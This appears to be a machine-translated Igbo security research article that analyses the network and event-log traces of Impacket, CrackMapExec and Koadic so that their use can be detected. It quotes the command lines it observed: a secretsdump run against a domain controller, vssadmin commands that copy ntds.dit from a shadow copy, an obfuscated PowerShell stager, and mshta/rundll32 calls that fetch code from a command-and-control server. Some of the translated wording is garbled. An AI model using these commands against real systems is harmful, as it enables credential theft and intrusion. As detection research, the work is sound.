Ọnụ ọgụgụ nke mwakpo na ngalaba ụlọ ọrụ na-eto eto kwa afọ: dịka ọmụmaatụ karịa na 2016, na njedebe nke 2018 - karịa n'oge gara aga. Gụnyere ndị ebe isi ọrụ bụ sistemụ arụmọrụ Windows. Na 2017-2018, APT Dragonfly, APT28, wakporo ndị gọọmentị na ndị agha na Europe, North America na Saudi Arabia. Anyị jikwa ngwaọrụ atọ maka nke a - , и . Koodu isi mmalite ha mepere emepe yana dị na GitHub.
Okwesiri iburu n'uche na a naghị eji ngwá ọrụ ndị a eme ihe maka ntinye mbụ, kama ịmepụta ọgụ n'ime akụrụngwa. Ndị na-awakpo na-eji ha na ọkwa dị iche iche nke mwakpo ahụ na-esote ntinye nke gburugburu. Nke a, site n'ụzọ, siri ike ịchọpụta na mgbe mgbe naanị site n'enyemaka nke nkà na ụzụ ma ọ bụ ngwaọrụ na-enye ohere . Ngwá ọrụ ndị a na-enye ọrụ dị iche iche, site na ịnyefe faịlụ gaa na-emekọrịta ihe na ndekọ na ime iwu na igwe dịpụrụ adịpụ. Anyị mere ọmụmụ ihe ndị a iji chọpụta ọrụ netwọk ha.
Ihe anyị kwesịrị ime:
- Ghọta ka ngwaọrụ hacking si arụ ọrụ. Chọpụta ihe ndị na-awakpo kwesịrị irigbu na ihe teknụzụ ha nwere ike iji.
- Chọta ihe anaghị achọpụta site na ngwaọrụ nchekwa ozi na ọkwa mbụ nke mbuso agha. Enwere ike ịwụfe usoro nlegharị anya, ma ọ bụ n'ihi na onye na-awakpo bụ onye na-awakpo n'ime, ma ọ bụ n'ihi na onye na-awakpo na-erigbu oghere na akụrụngwa nke a na-amabughị. Ọ ga-ekwe omume iweghachi ihe niile nke omume ya, n'ihi ya, ọchịchọ ịchọta mmegharị ọzọ.
- Wepụ ihe adịgboroja na ngwaọrụ nchọpụta mbubata. Anyị ekwesịghị ichefu na mgbe achọpụtara ụfọdụ omume na ndabere nke nlegharị anya naanị, enwere ike ịme mmejọ ugboro ugboro. Ọtụtụ mgbe na akụrụngwa enwere ụzọ zuru oke, nke a na-apụghị iche na ndị ziri ezi na nlele mbụ, iji nweta ozi ọ bụla.
Kedu ihe ngwaọrụ ndị a na-enye ndị na-awakpo? Ọ bụrụ na nke a bụ Impacket, mgbe ahụ, ndị na-awakpo na-enweta nnukwu ọbá akwụkwọ nke modul nke enwere ike iji mee ihe na ọkwa dị iche iche nke ọgụ na-esote mgbe ha mebie perimeter. Ọtụtụ ngwaọrụ na-eji modul Impacket n'ime - dịka ọmụmaatụ, Metasploit. Ọ nwere dcomexec na wmiexec maka mmebe iwu dịpụrụ adịpụ, ihe nzuzo maka ịnweta akaụntụ site na ebe nchekwa agbakwunyere na Impacket. N'ihi ya, nchọpụta ziri ezi nke ọrụ nke ụlọ akwụkwọ dị otú ahụ ga-eme ka nchọpụta nke ihe mmepụta ihe.
Ọ bụghị ihe ndaba na ndị okike dere "Powered by Impacket" gbasara CrackMapExec (ma ọ bụ naanị CME). Na mgbakwunye, CME nwere arụmọrụ emebere maka ọnọdụ ndị ama ama: Mimikatz maka ịnweta okwuntughe ma ọ bụ hashes ha, mmejuputa Meterpreter ma ọ bụ onye nnọchi anya Alaeze Ukwu maka igbu egbu, yana Bloodhound nọ n'ụgbọ.
Ngwá ọrụ nke atọ anyị họọrọ bụ Koadic. Ọ bụ ihe na-adịbeghị anya, e gosipụtara ya na ogbako hacker mba ụwa DEFCON 25 na 2017 ma bụrụ nke a na-ahụkarị site na usoro na-abụghị ọkọlọtọ: ọ na-arụ ọrụ site na HTTP, Java Script na Microsoft Visual Basic Script (VBS). A na-akpọ ụzọ a ibi n'ime ala: ngwá ọrụ na-eji usoro ndabere na ọba akwụkwọ arụnyere na Windows. Ndị okike na-akpọ ya COM Command & Control, ma ọ bụ C3.
IMPACKET
Ọrụ Impacket dị obosara nke ukwuu, sitere na nleba anya n'ime AD na ịnakọta data sitere na sava MS SQL dị n'ime, na usoro maka inweta nzere: nke a bụ ọgụ mgbagharị SMB, yana ịnweta faịlụ ntds.dit nwere hashes nke okwuntughe onye ọrụ site na onye njikwa ngalaba. Impacket na-ejikwa ụzọ anọ dị iche iche na-eme iwu ozugbo: WMI, Windows Scheduler Management Service, DCOM, na SMB, ma chọọ nzere iji mee ya.
mkpofu nzuzo
Ka anyị leba anya na mkpofu nzuzo. Nke a bụ modul nke nwere ike iru ma igwe ọrụ yana ndị na-ahụ maka ngalaba. Enwere ike iji ya nweta mbipụta nke ebe nchekwa LSA, SAM, SECURITY, NTDS.dit, ya mere enwere ike ịhụ ya na ọkwa dị iche iche nke ọgụ ahụ. Nzọụkwụ mbụ n'ime ọrụ modul bụ nkwenye site na SMB, nke chọrọ ma paswọọdụ onye ọrụ ma ọ bụ hash ya iji mee mwakpo nke Hash na-akpaghị aka. Ọzọ na-abịa a arịrịọ ka imeghe ohere na Service Control Manager (SCM) na nweta ohere na ndekọ site winreg protocol, na-eji nke onye na-awakpo nwere ike chọpụta data nke alaka mmasị na-enweta nsonaazụ site SMB.
Na fig. 1 anyị na-ahụ otú kpọmkwem mgbe ị na-eji winreg protocol, nweta ohere site na iji igodo ndekọ na LSA. Iji mee nke a, jiri iwu DCERPC nwere opcode 15 - OpenKey.
Osikapa. 1. Imepe igodo ndekọ site na iji winreg protocol
Na-esote, mgbe enwetara igodo ahụ, a na-echekwa ụkpụrụ ndị ahụ site na iwu SaveKey na opcode 20. Impacket na-eme nke a n'ụzọ doro anya. Ọ na-echekwa ụkpụrụ na faịlụ nke aha ya bụ eriri nke mkpụrụedemede 8 nke etinyere na .tmp. Na mgbakwunye, ntinye ọzọ nke faịlụ a na-eme site na SMB site na ndekọ ndekọ System32 (Fig 2).
Osikapa. 2. Atụmatụ maka inweta igodo ndekọ site na igwe dịpụrụ adịpụ
Ọ na-apụta na enwere ike ịchọpụta ọrụ dị otú ahụ na netwọkụ site na ajụjụ maka ụfọdụ ngalaba ndekọ aha site na iji usoro winreg, aha ụfọdụ, iwu na usoro ha.
Modul a na-ahapụkwa akara na ndekọ mmemme Windows, na-eme ka ọ dị mfe ịchọpụta. Dịka ọmụmaatụ, n'ihi ime iwu ahụ
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCN'ime ndekọ Windows Server 2016 anyị ga-ahụ usoro ihe omume ndị a:
1. 4624 - ebe dịpụrụ adịpụ Logon.
2. 5145 - ịlele ikike ịnweta ọrụ remote winreg.
3. 5145 - ịlele ikike ịnweta faịlụ na ndekọ System32. Faịlụ a nwere aha random akpọtụrụ n'elu.
4 - ịmepụta usoro cmd.exe na-ebupụta vssadmin:
“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5 - ịmepụta usoro na iwu:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6 - ịmepụta usoro na iwu:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7 - ịmepụta usoro na iwu:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
Dị ka ọtụtụ ngwaọrụ emegbu emegbu, Impacket nwere modul maka ime iwu ozugbo. Anyị ga-elekwasị anya na smbexec, nke na-enye shei iwu mmekọrịta na igwe dịpụrụ adịpụ. Modul a chọkwara nyocha site na SMB, ma ọ bụ jiri paswọọdụ ma ọ bụ hash paswọọdụ. Na fig. Na eserese 3 anyị na-ahụ ihe atụ nke otu ngwá ọrụ dị otú ahụ si arụ ọrụ, na nke a, ọ bụ njikwa njikwa mpaghara.
Osikapa. 3. Interactive smbexec console
Nzọụkwụ mbụ nke smbexec mgbe nyochachara bụ imepe SCM na iwu OpenSCManagerW (15). Ajụjụ a pụtara ama: ubi MachineName bụ DUMMY.
Osikapa. 4. Arịrịọ imeghe njikwa njikwa ọrụ
Na-esote, a na-emepụta ọrụ ahụ site na iji iwu CreateServiceW (12). N'ihe banyere smbexec, anyị nwere ike ịhụ otu iwu iwu iwu oge ọ bụla. Na fig. 5 akwụkwọ ndụ akwụkwọ ndụ na-egosi paramita iwu enweghị ike ịgbanwe, odo na-egosi ihe onye mwakpo nwere ike ịgbanwe. Ọ dị mfe ịhụ na aha faịlụ a na-arụ ọrụ, akwụkwọ ndekọ aha ya na faịlụ mmepụta nwere ike gbanwee, ma ndị ọzọ na-esiwanye ike ịgbanwe n'enweghị nsogbu nke mgbagwoju anya nke modul Impacket.
Osikapa. 5. Rịọ ka ịmepụta ọrụ site na iji njikwa njikwa ọrụ
Smbexec na-ahapụkwa akara doro anya na ndekọ mmemme Windows. N'ime ndekọ Windows Server 2016 maka mkpuchi iwu mmekọrịta yana iwu ipconfig, anyị ga-ahụ usoro ihe omume ndị a:
1 - ntinye nke ọrụ na igwe onye ihe metụtara:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2 - imepụta usoro cmd.exe yana arụmụka sitere na isi 4688.
3. 5145 - ịlele ikike ịnweta faịlụ __ mmepụta na ndekọ C$.
4. 4697 - ntinye nke ọrụ na igwe onye ahụ.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5 - imepụta usoro cmd.exe yana arụmụka sitere na isi 4688.
6. 5145 - ịlele ikike ịnweta faịlụ __ mmepụta na ndekọ C$.
Impacket bụ ihe ndabere maka mmepe nke ngwa ọgụ. Ọ na-akwado ihe fọrọ nke nta ka ọ bụrụ protocol niile dị na akụrụngwa Windows ma n'otu oge ahụ nwere njirimara njirimara ya. Nke a bụ arịrịọ winreg kpọmkwem, yana ojiji nke SCM API nwere njirimara iwu nhazi, yana usoro aha faịlụ, yana SMB òkè SYSTEM32.
CRACKMAPEXEC
Emebere ngwá ọrụ CME nke ọma iji megharịa omume ndị ahụ onye na-awakpo ga-eme ka ọ gaa n'ihu na netwọkụ. Ọ na-enye gị ohere ịrụ ọrụ na njikọ nke onye nnọchi anya Alaeze Ukwu a ma ama na Meterpreter. Iji mezuo iwu na nzuzo, CME nwere ike ikpuchi ha. Iji Bloodhound (ngwa ọrụ nyocha dị iche), onye na-awakpo nwere ike megharịa ọchụchọ maka nnọkọ ngalaba nchịkwa na-arụ ọrụ.
Bloodhound
Bloodhound, dị ka ngwá ọrụ kwụ ọtọ, na-enye ohere nyocha dị elu n'ime netwọk. Ọ na-anakọta data gbasara ndị ọrụ, igwe, otu, nnọkọ ma wetara ya dị ka script PowerShell ma ọ bụ faịlụ ọnụọgụ abụọ. A na-eji ụkpụrụ LDAP ma ọ bụ SMB nakọta ozi. Ngwakọta njikọta nke CME na-enye ohere ka ebudata Bloodhound na igwe onye ahụ, gbaa ọsọ wee nata data anakọtara mgbe emechara ya, si otú ahụ na-emezi omume na sistemụ na-eme ka ha ghara ịhụta ya. Shei eserese Bloodhound na-enye data anakọtara n'ụdị eserese, nke na-enye gị ohere ịchọta ụzọ kacha nso site na igwe onye mwakpo gaa na onye nchịkwa ngalaba.
Osikapa. 6. Interface Bloodhound
Iji na-agba ọsọ na igwe onye ahụ, modul na-emepụta ọrụ site na iji ATSVC na SMB. ATSVC bụ interface maka ịrụ ọrụ na Windows Task Scheduler. CME na-eji ọrụ NetrJobAdd(1) ya mepụta ọrụ na netwọkụ. Ihe atụ nke ihe CME modul na-eziga na-egosi na fig. 7: Nke a bụ oku iwu cmd.exe na koodu obfuscated n'ụdị arụmụka na usoro XML.
Fig.7. Ịmepụta ọrụ site na CME
Mgbe e debachara ọrụ ahụ maka igbu ya, igwe onye ahụ na-eme ihe na-amalite Bloodhound n'onwe ya, a pụkwara ịhụ nke a na okporo ụzọ. Ejiri ajụjụ LDAP mara modul a iji nweta otu ọkọlọtọ, ndepụta igwe niile na ndị ọrụ nọ na ngalaba ahụ, wee nweta ozi gbasara oge onye ọrụ na-arụ ọrụ site na arịrịọ SRVSVC NetSessEnum.
Osikapa. 8. Inweta ndepụta nke oge na-arụ ọrụ site na SMB
Na mgbakwunye, ibido Bloodhound n'igwe onye ihe metụtara nwere ike nyocha ya na mmemme nwere ID 4688 (mmepụta usoro) yana aha usoro. «C:WindowsSystem32cmd.exe». Ihe ama ama gbasara ya bụ arụmụka ahịrị iwu:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "Enum_av ngwaahịa
Enum_avproducts modul na-adọrọ mmasị nke ukwuu site n'echiche nke ọrụ na mmejuputa. WMI na-enye gị ohere iji asụsụ ajụjụ WQL iji weghachite data sitere na ihe Windows dị iche iche, nke bụ ihe CME modul a na-eji. Ọ na-ebute ajụjụ na klas AntiSpywareProduct na AntiRusProduct gbasara ngwaọrụ nchebe arụnyere na igwe onye ahụ. Iji nweta data dị mkpa, modul na-ejikọta na rootSecurityCenter2 namespace, wee wepụta ajụjụ WQL wee nweta nzaghachi. Na fig. Ọgụgụ 9 na-egosi ọdịnaya nke arịrịọ na nzaghachi. N'ihe atụ anyị, ahụrụ Windows Defender.
Osikapa. 9. Network ọrụ nke enum_avproducts modul
Ọtụtụ mgbe, nyocha WMI (Trace WMI-Activity), nke ihe omume nke ị nwere ike ịhụ ozi bara uru gbasara ajụjụ WQL, nwere ike nwee nkwarụ. Mana ọ bụrụ na enyere ya aka, mgbe ahụ ọ bụrụ na enum_avproducts script na-agba ọsọ, a ga-echekwa ihe omume nwere ID 11. Ọ ga-enwe aha onye ọrụ zitere arịrịọ na aha na rootSecurityCenter2 namespace.
Nke ọ bụla n'ime modul CME nwere arịa nke ya, ma ọ bụ ajụjụ WQL akọwapụtara ma ọ bụ imepụta ụdị ọrụ ụfọdụ na nhazi ọrụ nwere ihe mgbochi na ọrụ kpọmkwem Bloodhound na LDAP na SMB.
KOADIC
Akụkụ pụrụ iche nke Koadic bụ iji Javascript na ndị ntụgharị VBScript arụnyere n'ime Windows. N'echiche a, ọ na-agbaso usoro ndụ site na usoro ala - ya bụ, ọ nweghị ndabere na mpụga ma na-eji ngwaọrụ Windows ọkọlọtọ. Nke a bụ ngwá ọrụ maka iwu zuru ezu & njikwa (CnC), ebe ọ bụ na mgbe ọrịa gasịrị, a na-etinye "ịkụnye" na igwe, na-ekwe ka a na-achịkwa ya. Igwe dị otú ahụ, na okwu Koadic, ka a na-akpọ "zombie". Ọ bụrụ na enweghị ohere zuru oke maka ịrụ ọrụ zuru oke n'akụkụ onye ahụ, Koadic nwere ike ibulite ha site na iji usoro njikwa akaụntụ onye ọrụ (UAC bypass).
Osikapa. 10. Koadic Shell
Onye a tara ahụhụ ga-ebido nzikọrịta ozi na ihe nkesa Command & Control. Iji mee nke a, ọ kwesịrị ịkpọtụrụ URI akwadoro na mbụ wee nata isi Koadic site na iji otu n'ime ndị na-eme egwuregwu. Na fig. Ọgụgụ 11 na-egosi atụ maka mshta stager.
Osikapa. 11. Ịmalite nnọkọ na sava CnC
Dabere na mgbanwe nzaghachi WS, ọ bịara doo anya na ogbugbu na-eme site na WScript.Shell, na mgbanwe STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE nwere ozi bụ isi banyere paramita nke nnọkọ dị ugbu a. Nke a bụ ụzọ nzaghachi arịrịọ mbụ na njikọ HTTP nwere sava CnC. Arịrịọ ndị na-esote na-emetụta kpọmkwem na arụmọrụ nke modul a na-akpọ (implants). Modul Koadic niile na-arụ ọrụ naanị na nnọkọ na-arụ ọrụ na CnC.
Mimikatz
Dịka CME na Bloodhound na-arụ ọrụ, Koadic na-arụ ọrụ na Mimikatz dị ka mmemme dị iche ma nwee ọtụtụ ụzọ isi malite ya. N'okpuru bụ ụzọ nzaghachi arịrịọ maka nbudata ihe ntinye Mimikatz.
Osikapa. 12. Nyefee Mimikatz na Koadic
Ị nwere ike ịhụ ka usoro URI dị na arịrịọ ahụ siri gbanwee. O nwere ugbu a uru maka csrf variable, nke na-ahụ maka modul ahọpụtara. Unu elela aha-ya anya; Anyị niile maara na a na-aghọtakarị CSRF n'ụzọ dị iche. Nzaghachi bụ otu isi ahụ nke Koadic, nke agbakwunyere koodu metụtara Mimikatz. Ọ buru nnọọ ibu, ya mere, ka anyị leba anya n'isi ihe. N'ebe a, anyị nwere ọbá akwụkwọ Mimikatz nke etinyere na base64, klas .NET serialized nke ga-agbanye ya, yana arụmụka iji malite Mimikatz. A na-ebufe nsonaazụ ogbugbu na netwọkụ na ederede doro anya.
Osikapa. 13. Nsonaazụ nke ịgba ọsọ Mimikatz na igwe dịpụrụ adịpụ
Exc_cmd
Koadic nwekwara modul nwere ike ime iwu n'ime oge. N'ebe a, anyị ga-ahụ otu usoro ọgbọ URI na ụdị sid na csrf ama ama. N'ihe banyere modul exec_cmd, a na-agbakwunye koodu n'ime ahụ nke nwere ike ịme iwu shei. N'okpuru bụ egosiri koodu dị na nzaghachi HTTP nke sava CnC.
Osikapa. 14. Koodu ntinye exec_cmd
A chọrọ mgbanwe GAWTUUGCFI nwere njiri mara WS maka mmebe koodu. Site n'enyemaka ya, ihe ntinye ahụ na-akpọ shei ahụ, na-edozi alaka abụọ nke koodu - shell.exec na nloghachi nke iyi data mmepụta na shell.run na-enweghị nlọghachi.
Koadic abụghị ngwá ọrụ a na-ahụkarị, mana o nwere ihe ndị e ji emepụta ihe nke a pụrụ ịchọta ya na okporo ụzọ ziri ezi:
- nguzobe pụrụ iche nke arịrịọ HTTP,
- iji winHttpRequests API,
- imepụta ihe WScript.Shell site na ActiveXObject,
- nnukwu executable ahu.
Onye na-eme ihe na-amalite njikọ mbụ, yabụ enwere ike ịchọpụta ọrụ ya site na mmemme Windows. Maka mshta, nke a bụ ihe omume 4688, nke na-egosi ịmepụta usoro nwere njirimara mmalite:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6Mgbe Koadic na-agba ọsọ, ị nwere ike ịhụ ihe omume 4688 ndị ọzọ nwere njiri mara ya nke ọma:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1Nchoputa
Ibi ndụ pụọ n'omume ala na-enweta ewu ewu n'etiti ndị omempụ. Ha na-eji ngwa na usoro arụnyere na Windows maka mkpa ha. Anyị na-ahụ ngwaọrụ ndị ama ama Koadic, CrackMapExec na Impacket na-agbaso ụkpụrụ a na-apụtawanye na akụkọ APT. Ọnụ ọgụgụ ndụdụ na GitHub maka ngwaọrụ ndị a na-etokwa, na ndị ọhụrụ na-apụta (enwerelarị ihe dị ka otu puku n'ime ha ugbu a). Omume a na-ewu ewu n'ihi ịdị mfe ya: ndị na-awakpo anaghị achọ ngwá ọrụ ndị ọzọ; ha abanyelarị na igwe ndị ihe metụtara ma nyere ha aka ịgafe usoro nchebe. Anyị na-elekwasị anya n'ịmụ nkwurịta okwu netwọk: ngwá ọrụ ọ bụla akọwara n'elu na-ahapụ akara nke ya na okporo ụzọ netwọk; nnyocha zuru ezu nke ha nyere anyị ohere ịkụziri ngwaahịa anyị chọpụta ha, nke na-enyere aka n'ikpeazụ nyochaa usoro ihe omume cyber metụtara ha.
Authors:
- Anton Tyurin, Onye isi ngalaba ọrụ ọkachamara, PT Expert Security Center, Teknụzụ Dị Mma
- Egor Podmokov, ọkachamara, PT Expert Security Center, Ezi Teknụzụ
isi: www.habr.com